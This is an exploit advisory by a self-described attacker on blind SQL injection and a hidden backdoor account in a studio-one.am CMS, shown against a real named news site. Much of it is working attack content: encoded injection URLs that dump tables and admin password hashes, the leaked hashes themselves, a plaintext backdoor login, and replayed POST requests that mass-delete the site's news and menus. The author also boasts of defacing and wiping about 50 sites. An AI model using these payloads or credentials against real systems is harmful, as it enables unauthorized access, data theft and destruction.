======================================================== Vulnerable Software(S): CMS | 1.11b/CMS | 1.7.1 From Studio-one.am Vulnerabilities: This Content management systems suffers from Remote Blind SQl injection and Backdoor account. Software License: Commercial Vendor: studio-one.am Discovered and Exploited: In Wild ======================================================== I'M=> AkaStep<= RESPONSIBLE FOR EVERYTHING IN THIS advisory= ********************** REALLY! ******************************************** ******************ENJOY MAXIMALLY************************************** Full Disclosure: The following CMS | 1.11b and CMS | 1.7.1 (From Studio-one.am) content management systems suffers from Remote Blind SQl injection and Backdoor account. //TRUE http://galatv.am/news/other/aimm-naxagahh%27%20or%20sleep(10)--%20and%205=%275.html We got time delay: galatv.am CMS | 1.11b http://galatv.am/news/other/aimm-naxagahh%27%20order%20by%2026--%20and%205=%275.html Got Columns count: 26 Problem number 1: We can't use =>,<= Otherwise we'll get 404 (May be rewrite rule?) Bypass?Pretty simple: hex() representation of =>,=> so it's=> %2C http://galatv.am/news/other/aimm-naxagahh%27%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26--%20and%205=%275.html http://galatv.am/news/other/aimm-naxagahh%27%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26--%20and%205=%275.html Success! http://galatv.am/news/other/saimm-naxagahh%27%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26--%20and%205=%275.html 21 22 21 24 14- http://galatv.am/news/other/saimm-naxagahh%27%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2Cgroup_concat%28table_name%29%2C22%2C23%2C24%2C25%2C26%20from%20information_schema.tables--%20and%205=%275.html CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,s1_ads,s1_ads_menu_rel,s1_ads_ml,s1_adsgroup,s1_adsgroup_ml,s1_answers,s1_answers_ml,s1_autor,s1_autor_m So we need obtain: login password from s1_users galatv.am/news/other/saimm-naxagahh' union select 1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2Cgroup_concat(login%2Cpassword)%2C22%2C23%2C24%2C25%2C26 from s1_users-- and 5='5.html 100% ---------------------------------------------------- admin 6dedf4ba59fbcd8c2d72eec63738fc6d GalaAdmin 4bad4ecf9b88e344a7e6fbe517d4e590 ---------------------------------------------------- newPass123 Printscreen: http://s44.radikal.ru/i106/1209/3c/64f2a7cf8278.png OwNEd! http://zone-h.org/mirror/id/18297506 Done! Ok.After gaining access to administration panel i noticed theris 2800>= news exists in database. Ownage without "rm"s or without "drop"s agains .am domains is not interesting anymore. Searching..Searching..Got it: Here is truncating way: ------------------------------------------------------------------------------------------------------------------------ Live HTTP Headers: URL: http://galatv.am/admin/news-content/news?viewAjax=1&action=delete&tpl=view.tpl Host: galatv.am User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 18 Cookie: PHPSESSID=ak1cgrd9c1rlm5fgca26vnjh73 Pragma: no-cache Cache-Control: no-cache POST DATA: viewAjax=1&id=1000000000000 or id!=3-- *REPLAY* ------------------------------------------------------------------------------------------------------------------------ Printscreen: http://s019.radikal.ru/i625/1209/95/fccad046aa62.png BoOm!) All news was successfully "truncated" using SQLi vuln) Then i needed to truncate menu sections: Same technique: ------------------------------------------------------------------------------------------------------------------------ Live HTTP Headers: URL: http://galatv.am/admin/content%20elements/menu?viewAjax=1&action=delete&tpl=view.tpl Host: galatv.am User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 16 Cookie: menutreeNodes=%5B1%5D; PHPSESSID=ak1cgrd9c1rlm5fgca26vnjh73; __utma=137480943.837184604.1346617574.1346617574.1346617574.1; __utmb=137480943.2.10.1346617574; __utmc=137480943; __utmz=137480943.1346617574.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none) Pragma: no-cache Cache-Control: no-cache POST DATA: viewAjax=1&id=27 or id!=007 ------------------------------------------------------------------------------------------------------------------------ Again Boom!) =================== WE ALSO LOVE BACKDOORS======================== This CMS also suffers from backdoor account which has full administrative privileges. It is also hidden account: This means you can't see it from administration panel: Print screen: ( Basically: theris 1 backdoor account and 1 legal administrator. Notice: backdoor account isn't visible anymre ) http://s53.radikal.ru/i140/1209/c4/685d07418e00.png I used this administrative account to deface and "rm" approx 50 .am sites) Login: admin Pass: newPass123 =====================CMS version 1.7.1 ============================== How it looks: http://s019.radikal.ru/i602/1209/2d/85589f0d9f49.png Also suffers from backdoor account: Print screen: http://i021.radikal.ru/1209/83/8390644da6b5.png The account named: admin still invisible again. :: CMS :: | 1.7.1 Demo: http://new.galatv.am/admin/ Login: admin Pass: newPass123 This version also is vulnerable to SQLi Again i'm "rm"-ned all news using SQLi: URL: http://new.galatv.am/admin/news-block/news?action=delete&viewAjax=1&tpl=dt/edit-dialog.tpl Host: new.galatv.am User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 38 Cookie: PHPSESSID=bqu6dn6ks70iqocivfioetomh7 Pragma: no-cache Cache-Control: no-cache POST DATA: btnDelete=Delete&btnCancel=Cancel&id=1 or id!=011111111111111 Returned: {"succsess":true,"records":["1 or id!=011111111111111"]} ========================================== To studio-one.am: We luve backdoors too;) =============== THE END =================== SHOUTZ AND GREAT THANKS TO ALL MY FRIENDS: =========================================================== packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com exploit-db.com to all AA Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3.* =========================================================== /AkaStep